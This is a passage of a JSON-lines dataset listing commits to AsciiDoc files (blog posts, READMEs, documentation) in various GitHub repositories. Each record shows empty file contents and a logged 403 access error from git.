2015-06-24-Mon-premier-talk.adoc","repos":"anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog","old_file":"_posts\/2015-06-24-Mon-premier-talk.adoc","new_file":"_posts\/2015-06-24-Mon-premier-talk.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anthonny\/personal-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"574e88e3ef415701041a31f4923ff0c5eccbfb8b","subject":"Update 2015-11-05-Google-Big-Table.adoc","message":"Update 2015-11-05-Google-Big-Table.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-11-05-Google-Big-Table.adoc","new_file":"_posts\/2015-11-05-Google-Big-Table.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1c598742f997a4416d858cef5bf9b722c313cfb5","subject":"Update 2017-02-24-Google-Extension.adoc","message":"Update 2017-02-24-Google-Extension.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-24-Google-Extension.adoc","new_file":"_posts\/2017-02-24-Google-Extension.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"39fe25caa1ae5a391cd826a35007fadbd3cf2b5b","subject":"Announcement of 0.9.3 release","message":"Announcement of 0.9.3 release\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"blog\/2019-03-26-debezium-0-9-3-final-released.adoc","new_file":"blog\/2019-03-26-debezium-0-9-3-final-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"cf12147e35d3198e24dc1c1d5875ddbfdfd809ff","subject":"move section on identifiers","message":"move section on identifiers\n","repos":"jsanda\/hawkular.github.io,jsanda\/hawkular.github.io,jsanda\/hawkular.github.io,jsanda\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/docs\/components\/metrics\/index.adoc","new_file":"src\/main\/jbake\/content\/docs\/components\/metrics\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jsanda\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"28fea4ee52325e72557d94dc5a0c55a5e9e1394c","subject":"Update 2017-02-09-test1.adoc","message":"Update 2017-02-09-test1.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2017-02-09-test1.adoc","new_file":"_posts\/2017-02-09-test1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7d34ca334f1c698aa7d824723c00d3dbfe129207","subject":"Update 2016-03-22-Paris-terrorists-hid.adoc","message":"Update 2016-03-22-Paris-terrorists-hid.adoc","repos":"fwalloe\/infosecbriefly,fwalloe\/infosecbriefly,fwalloe\/infosecbriefly,fwalloe\/infosecbriefly","old_file":"_posts\/2016-03-22-Paris-terrorists-hid.adoc","new_file":"_posts\/2016-03-22-Paris-terrorists-hid.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fwalloe\/infosecbriefly.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4b82b6ed10ac15f043ec24e59dbdc5069c85dc36","subject":"Update 2016-12-14-Um-mundo-holografico.adoc","message":"Update 2016-12-14-Um-mundo-holografico.adoc","repos":"arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io","old_file":"_posts\/2016-12-14-Um-mundo-holografico.adoc","new_file":"_posts\/2016-12-14-Um-mundo-holografico.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/arthurmolina\/arthurmolina.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"218a915330d370ce3d567a3a8397e87d8a76df30","subject":"Fixed typo","message":"Fixed typo\n","repos":"LFUnion\/left,LFUnion\/left,LFUnion\/left,LFUnion\/left","old_file":"compiler\/README.asciidoc","new_file":"compiler\/README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LFUnion\/left.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cef96b66483cc5190bfeee929d66c27a017ca727","subject":"Added documentation on customizing\/configuring the scheduler","message":"Added documentation on customizing\/configuring the scheduler\n","repos":"xiaoping378\/openshift-docs,xiaoping378\/openshift-docs,xiaoping378\/openshift-docs","old_file":"using_openshift\/scheduler.adoc","new_file":"using_openshift\/scheduler.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xiaoping378\/openshift-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3b5957578fb8237f502efbb3965607e76f9ab866","subject":"Added preliminary i18n support file (PR #1743)","message":"Added preliminary i18n support file (PR #1743)\n\n* First addition to temporary i18n support strings (Italian complete)\r\n","repos":"asciidocfx\/asciidoctor,asciidocfx\/asciidoctor","old_file":"data\/locale\/attributes.adoc","new_file":"data\/locale\/attributes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/asciidocfx\/asciidoctor.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"84a7c89f80c0d08f72dccf5c5a37dc24a572917f","subject":"Update 2016-05-17-docker-clouster-with-rancher.adoc","message":"Update 2016-05-17-docker-clouster-with-rancher.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-05-17-docker-clouster-with-rancher.adoc","new_file":"_posts\/2016-05-17-docker-clouster-with-rancher.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aa98d1f76e36b8636fca356d14d42f1eac156952","subject":"Update 2018-06-08-Swift-Firestore.adoc","message":"Update 2018-06-08-Swift-Firestore.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-08-Swift-Firestore.adoc","new_file":"_posts\/2018-06-08-Swift-Firestore.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"94c177f3b1d209677f0208f78681d6baeca9c728","subject":"Update 2016-04-11-Wielding-your-newly-built-T-D-D-Wand.adoc","message":"Update 2016-04-11-Wielding-your-newly-built-T-D-D-Wand.adoc","repos":"metasean\/blog,metasean\/blog,metasean\/blog,metasean\/hubpress.io,metasean\/blog,metasean\/hubpress.io,metasean\/hubpress.io","old_file":"_posts\/2016-04-11-Wielding-your-newly-built-T-D-D-Wand.adoc","new_file":"_posts\/2016-04-11-Wielding-your-newly-built-T-D-D-Wand.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/metasean\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2b363b5432754064419855ece87403c239ff1ed3","subject":"Update 2016-09-30-Testing-chef-cookbooks-the-dirty-way.adoc","message":"Update 2016-09-30-Testing-chef-cookbooks-the-dirty-way.adoc","repos":"InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io","old_file":"_posts\/2016-09-30-Testing-chef-cookbooks-the-dirty-way.adoc","new_file":"_posts\/2016-09-30-Testing-chef-cookbooks-the-dirty-way.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InformatiQ\/informatiq.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e6bf00ebeecfaa6a8830b124e4f5b5e4423228d4","subject":"Update 2017-02-20-Testing-DNS-Infrastructure-with-Goss.adoc","message":"Update 2017-02-20-Testing-DNS-Infrastructure-with-Goss.adoc","repos":"pysysops\/pysysops.github.io,pysysops\/pysysops.github.io,pysysops\/pysysops.github.io,pysysops\/pysysops.github.io","old_file":"_posts\/2017-02-20-Testing-DNS-Infrastructure-with-Goss.adoc","new_file":"_posts\/2017-02-20-Testing-DNS-Infrastructure-with-Goss.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pysysops\/pysysops.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e1c6726dabf4bc6385110eb198312d1e08bde301","subject":"Update 2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","message":"Update 2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","new_file":"_posts\/2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1f4ad53e743048acc293962924e0a9b3913a4b55","subject":"Create how_to_build.adoc","message":"Create how_to_build.adoc","repos":"restSampleServices\/node-service,restSampleServices\/node-service,restSampleServices\/node-service","old_file":"doc\/how_to_build.adoc","new_file":"doc\/how_to_build.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/restSampleServices\/node-service.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0195218038f631ed77871eb0d8889ecee25b983e","subject":"Update 2017-02-14-Nest-Devices.adoc","message":"Update 2017-02-14-Nest-Devices.adoc","repos":"datumrich\/datumrich.github.io,datumrich\/datumrich.github.io,datumrich\/datumrich.github.io,datumrich\/datumrich.github.io","old_file":"_posts\/2017-02-14-Nest-Devices.adoc","new_file":"_posts\/2017-02-14-Nest-Devices.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/datumrich\/datumrich.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4af011fed0b96b1feb0682f6658a5747eb3de238","subject":"y2b create post iPhone 5s \\\/ 5c Launch Line at Apple Store!","message":"y2b create post iPhone 5s \\\/ 5c Launch Line at Apple Store!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-09-20-iPhone-5s--5c-Launch-Line-at-Apple-Store.adoc","new_file":"_posts\/2013-09-20-iPhone-5s--5c-Launch-Line-at-Apple-Store.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4ae029238f8dcecc293939f60e9266380e689898","subject":"Update 2016-09-06-Episode-71-Things-That-Make-You-Go-Hummm.adoc","message":"Update 2016-09-06-Episode-71-Things-That-Make-You-Go-Hummm.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2016-09-06-Episode-71-Things-That-Make-You-Go-Hummm.adoc","new_file":"_posts\/2016-09-06-Episode-71-Things-That-Make-You-Go-Hummm.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c350cc2231721c7587bcee00baf4ee03c3d37a18","subject":"Updates forum link","message":"Updates forum link\n","repos":"bartoszmajsak\/arquillian-core,MatousJobanek\/arquillian-core,MatousJobanek\/arquillian-core,rhusar\/arquillian-core,rhusar\/arquillian-core,arquillian\/arquillian-core,bartoszmajsak\/arquillian-core","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rhusar\/arquillian-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"92c015f885a8c1e8e04dd039e04d568427b7d0f6","subject":"Updated README credit URL","message":"Updated README credit URL\n\nNecessary to pick up new author profile URL.\n","repos":"bkuhlmann\/ruby_setup,bkuhlmann\/ruby_setup","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bkuhlmann\/ruby_setup.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a5ce4f5e3dfb69a0d2b8245da87fcca30678e22d","subject":"Add archive text to README.adoc","message":"Add archive text to README.adoc\n","repos":"spring-projects\/aws-ant","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-projects\/aws-ant.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b24e72f6b7196c46c49d5bad9d1a3ddba6e7b260","subject":"updated README","message":"updated README\n","repos":"docToolchain\/docToolchain,docToolchain\/docToolchain,docToolchain\/docToolchain,carloslozano\/docToolchain,jakubjab\/docToolchain,carloslozano\/docToolchain,docToolchain\/docToolchain,carloslozano\/docToolchain","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/docToolchain\/docToolchain.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"37c114a177cddfab7656da39e610ed8c101ba909","subject":"y2b create post This Gadget Scans Color From Anything!","message":"y2b create post This Gadget Scans Color From Anything!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-09-28-This-Gadget-Scans-Color-From-Anything.adoc","new_file":"_posts\/2016-09-28-This-Gadget-Scans-Color-From-Anything.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dc3b193efb4b82fdec681f0c625075b67e561cf3","subject":"Update 2016-07-18-New-Blog.adoc","message":"Update 2016-07-18-New-Blog.adoc","repos":"laura-arreola\/laura-arreola.github.io,laura-arreola\/laura-arreola.github.io,laura-arreola\/laura-arreola.github.io,laura-arreola\/laura-arreola.github.io","old_file":"_posts\/2016-07-18-New-Blog.adoc","new_file":"_posts\/2016-07-18-New-Blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/laura-arreola\/laura-arreola.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e1b09ed6bb7ff1ac6ae86f3a377a2f2ff1ede3ad","subject":"Update 2016-08-02-ONE-post.adoc","message":"Update 2016-08-02-ONE-post.adoc","repos":"jamarortiz\/pragmaticalware,jamarortiz\/pragmaticalware,jamarortiz\/pragmaticalware,jamarortiz\/pragmaticalware","old_file":"_posts\/2016-08-02-ONE-post.adoc","new_file":"_posts\/2016-08-02-ONE-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jamarortiz\/pragmaticalware.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8a5297c6b660c318910da1f392e04b578f2d45e0","subject":"Some clarifications","message":"Some clarifications\n","repos":"sergehuber\/contextserver-graphql-api","old_file":"docs\/index.adoc","new_file":"docs\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sergehuber\/contextserver-graphql-api.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"995609a0935189bcf3c157fa5a9b3a9bf660b6db","subject":"initial cut of reworked GEP-8","message":"initial cut of reworked GEP-8\n","repos":"groovy\/groovy-website,groovy\/groovy-website","old_file":"site\/src\/site\/wiki\/GEP-8.adoc","new_file":"site\/src\/site\/wiki\/GEP-8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/groovy\/groovy-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a2247d47b5689d19e66fae189a7ca08c093f9b08","subject":"Update 2016-11-14-redux-logger-index-has-no-default-export-redux-thunk-redux-promise-webpack-typescript.adoc","message":"Update 2016-11-14-redux-logger-index-has-no-default-export-redux-thunk-redux-promise-webpack-typescript.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-11-14-redux-logger-index-has-no-default-export-redux-thunk-redux-promise-webpack-typescript.adoc","new_file":"_posts\/2016-11-14-redux-logger-index-has-no-default-export-redux-thunk-redux-promise-webpack-typescript.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e0a274b316fc98907386768c5f3de151522ea679","subject":"Add code of conduct","message":"Add code of conduct\n","repos":"ollie314\/spring-android,spring-projects\/spring-android,ollie314\/spring-android,spring-projects\/spring-android,royclarkson\/spring-android,royclarkson\/spring-android","old_file":"CODE_OF_CONDUCT.adoc","new_file":"CODE_OF_CONDUCT.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/royclarkson\/spring-android.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c88546f98643590182c7b302cc02f451c53dc6b6","subject":"Update 2017-XX-XX-Testing-puppet-agent-on-Ubuntu-on-Windows.adoc","message":"Update 2017-XX-XX-Testing-puppet-agent-on-Ubuntu-on-Windows.adoc","repos":"nnn-dev\/nnn-dev.github.io,nnn-dev\/nnn-dev.github.io,nnn-dev\/nnn-dev.github.io,nnn-dev\/nnn-dev.github.io","old_file":"_posts\/2017-XX-XX-Testing-puppet-agent-on-Ubuntu-on-Windows.adoc","new_file":"_posts\/2017-XX-XX-Testing-puppet-agent-on-Ubuntu-on-Windows.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nnn-dev\/nnn-dev.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"17c98199deeaad449a3bd589c463054b8f4e4b7c","subject":"Update 2017-03-03-C-S-S-triangle.adoc","message":"Update 2017-03-03-C-S-S-triangle.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-03-C-S-S-triangle.adoc","new_file":"_posts\/2017-03-03-C-S-S-triangle.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"222a7a7ee41635c2f64f2a4a0cd21f018b420791","subject":"Renamed '_posts\/2019-01-31-Find-your-HOME.adoc' to '_posts\/2017-10-23-Find-your-HOME.adoc'","message":"Renamed '_posts\/2019-01-31-Find-your-HOME.adoc' to '_posts\/2017-10-23-Find-your-HOME.adoc'","repos":"sebasmonia\/sebasmonia.github.io,sebasmonia\/sebasmonia.github.io,sebasmonia\/sebasmonia.github.io,sebasmonia\/sebasmonia.github.io","old_file":"_posts\/2017-10-23-Find-your-HOME.adoc","new_file":"_posts\/2017-10-23-Find-your-HOME.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sebasmonia\/sebasmonia.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dee486d5eb8fccf602910c9868d4837fd11f3b6e","subject":"Update 2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","message":"Update 2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","new_file":"_posts\/2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"266ba544e8d03339412779985472aa4bf69d7b00","subject":"Added readme for temperature broadcast project","message":"Added readme for temperature broadcast project\n","repos":"NordicSemiconductor\/ble-sdk-arduino,NordicSemiconductor\/ble-sdk-arduino,Cheong2K\/ble-sdk-arduino,pi19404\/ble-sdk-arduino,pi19404\/ble-sdk-arduino,NordicSemiconductor\/ble-sdk-arduino,NordicSemiconductor\/ble-sdk-arduino,Cheong2K\/ble-sdk-arduino,Cheong2K\/ble-sdk-arduino,NordicSemiconductor\/ble-sdk-arduino,pi19404\/ble-sdk-arduino,Cheong2K\/ble-sdk-arduino,pi19404\/ble-sdk-arduino","old_file":"libraries\/BLE\/examples\/ble_temperature_broadcast\/README.adoc","new_file":"libraries\/BLE\/examples\/ble_temperature_broadcast\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pi19404\/ble-sdk-arduino.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b2cc57cd9a21936a597cfbb183d474f3cf0b2146","subject":"Update 2016-6-29-PHP-CSV.adoc","message":"Update 2016-6-29-PHP-CSV.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-6-29-PHP-CSV.adoc","new_file":"_posts\/2016-6-29-PHP-CSV.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8f5ce68e0fd07ad6d068e0c1129a23492647eb77","subject":"Update 2016-04-07-Analizando-cabeceras-E-mail.adoc","message":"Update 2016-04-07-Analizando-cabeceras-E-mail.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-07-Analizando-cabeceras-E-mail.adoc","new_file":"_posts\/2016-04-07-Analizando-cabeceras-E-mail.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3ea661e0910684caf8b6d63f6ebdda1062bdee98","subject":"Update 2016-04-07-Analizando-cabeceras-E-mail.adoc","message":"Update 2016-04-07-Analizando-cabeceras-E-mail.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-07-Analizando-cabeceras-E-mail.adoc","new_file":"_posts\/2016-04-07-Analizando-cabeceras-E-mail.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9ddcb928333b5610cb5803de8ab8b436e377f208","subject":"Update 2017-03-16-What-init-system-am-I-using.adoc","message":"Update 2017-03-16-What-init-system-am-I-using.adoc","repos":"jsiu22\/blog,jsiu22\/blog,jsiu22\/blog,jsiu22\/blog","old_file":"_posts\/2017-03-16-What-init-system-am-I-using.adoc","new_file":"_posts\/2017-03-16-What-init-system-am-I-using.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jsiu22\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c38551c6419c33fddcda9220b4d15691a2f34a07","subject":"Update 2017-08-06-WWJQD-What-Would-j-Query-Do.adoc","message":"Update 2017-08-06-WWJQD-What-Would-j-Query-Do.adoc","repos":"ashelle\/ashelle.github.io,ashelle\/ashelle.github.io,ashelle\/ashelle.github.io,ashelle\/ashelle.github.io","old_file":"_posts\/2017-08-06-WWJQD-What-Would-j-Query-Do.adoc","new_file":"_posts\/2017-08-06-WWJQD-What-Would-j-Query-Do.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ashelle\/ashelle.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5c56e9f9d02c6be134ae8c7fb090e568ce909946","subject":"y2b create post The Most RIDICULOUS MacBook Pro","message":"y2b create post The Most RIDICULOUS MacBook Pro","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-01-05-TheMostRIDICULOUSMacBookPro.adoc","new_file":"_posts\/2018-01-05-TheMostRIDICULOUSMacBookPro.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"83425aed0c8c8055491dd6b9d7837ad5c6a21ae3","subject":"initial commit","message":"initial commit\n","repos":"dalbhanj\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop,wombat\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop","old_file":"quick-deploy\/readme.adoc","new_file":"quick-deploy\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dalbhanj\/kubernetes-aws-workshop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9e31472d0742bf6f67f60a9a3ea4cac473724802","subject":"Update 2016-6-29-PHP-CSV.adoc","message":"Update 2016-6-29-PHP-CSV.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-6-29-PHP-CSV.adoc","new_file":"_posts\/2016-6-29-PHP-CSV.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f2d32dae73741f953d3d7cf322b189ec614bc589","subject":"Update 2015-08-15-Een-test.adoc","message":"Update 2015-08-15-Een-test.adoc","repos":"PauloMoekotte\/PauloMoekotte.github.io,PauloMoekotte\/PauloMoekotte.github.io,PauloMoekotte\/PauloMoekotte.github.io","old_file":"_posts\/2015-08-15-Een-test.adoc","new_file":"_posts\/2015-08-15-Een-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/PauloMoekotte\/PauloMoekotte.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dd3a332b9d66b926f1d0e85fe38e69c9853e0d5f","subject":"add adoc to version control","message":"add adoc to version control\n","repos":"naipmoro\/lofmm","old_file":"lof_in_mm.adoc","new_file":"lof_in_mm.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/naipmoro\/lofmm.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 